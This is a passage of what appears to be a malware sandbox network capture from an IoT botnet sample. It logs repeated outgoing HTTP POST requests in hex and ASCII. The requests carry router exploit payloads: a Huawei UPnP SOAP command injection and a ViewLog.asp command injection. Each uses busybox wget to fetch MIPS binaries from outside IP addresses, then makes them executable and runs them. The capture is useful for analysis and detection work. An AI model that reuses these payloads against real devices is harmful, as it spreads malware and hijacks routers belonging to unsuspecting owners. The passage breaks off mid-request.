65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              149192.168.2.134924041.250.5.1337215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.066030979 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              150192.168.2.135773031.136.5.2188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.687309980 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:43.270593882 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:44.422637939 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:46.726655006 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:51.334574938 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:00.550704002 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.494532108 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:56.358462095 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              151192.168.2.135572831.136.135.978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.689007044 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:43.270585060 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:44.422728062 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:46.726635933 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:51.334575891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:00.550699949 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.494551897 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:56.358453989 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              152192.168.2.133292294.236.201.1988080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.718461990 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:42.933552027 CET502INHTTP/1.1 401 Unauthorized
                                              Date: Sat, 09 May 2015 14:44:54 GMT
                                              Server: Boa/0.94.14rc21
                                              Accept-Ranges: bytes
                                              Content-encoding: gzip
                                              Connection: close
                                              WWW-Authenticate: Basic realm="WF2780_US"
                                              user"
                                              Content-Type: text/html; charset=ISO-8859-1
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 67 65 74 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 66 72 6f 6d 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD><BODY><H1>401 Unauthorized</H1>Your client does not have permission to get URL /cgi-bin/ViewLog.asp from this server.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              153192.168.2.135071494.242.229.2538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.815501928 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              154192.168.2.136062685.69.35.158080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.867172003 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:43.430696011 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:44.518594027 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:46.726614952 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
